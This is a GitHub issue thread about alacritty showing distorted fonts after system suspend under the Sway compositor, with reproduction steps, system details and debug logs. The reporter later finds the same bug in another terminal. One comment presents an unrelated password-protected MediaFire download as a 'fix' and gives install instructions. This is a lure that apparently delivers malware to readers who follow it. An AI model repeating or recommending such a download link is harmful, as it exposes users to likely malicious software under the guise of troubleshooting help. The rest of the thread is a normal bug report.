### ISSUE TITLE
Font rendering issue after suspend in Sway

### ISSUE THREAD

**Issue by braun-steven** [alacritty/alacritty#8149]
After waking the system from suspend, alacritty renders fonts differently/wrong:

Before suspend:
![2024-08-27T09:03:46,975776173+02:00](https://github.com/user-attachments/assets/9d10a5eb-56a2-4456-8ced-b348362d712b)
After suspend:
![2024-08-27T09:03:29,399305923+02:00](https://github.com/user-attachments/assets/fb2b8a99-0eb3-4999-b4a4-d4b2e3d87612)

I can reproduce this in Sway with

- open new alacritty window
- `systemctl suspend`
- wake up
- observe weird font

I tried the same in Gnome but cannot reproduce the described issue -- font rendering is not affected after waking up. See the logs below for Sway and Gnome. I cannot reproduce this issue with any other terminal emulator on Sway -- only alacritty is affected.

### System

OS: Fedora Linux (`Linux tuxedo 6.10.6-200.fc40.x86_64 #1 SMP PREEMPT_DYNAMIC Mon Aug 19 14:09:30 UTC 2024 x86_64 GNU/Linux`)
Version: `alacritty 0.13.2`
Linux: Wayland, Sway 1.9 (scale 1.0)

### Logs

Output of `WAYLAND_DEBUG=1 alacritty -vv --print-events`:

- Sway (issue): [alacritty-sway.log](https://github.com/user-attachments/files/16758292/alacritty.log)
- Gnome (no issue): [alacritty-gnome.log](https://github.com/user-attachments/files/16758298/alacritty-gnome.log)

**Comment by FoioMikael** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by braun-steven** [comment]
Never mind, the same issue just happened in `foot`. I'll reopen this in sway.
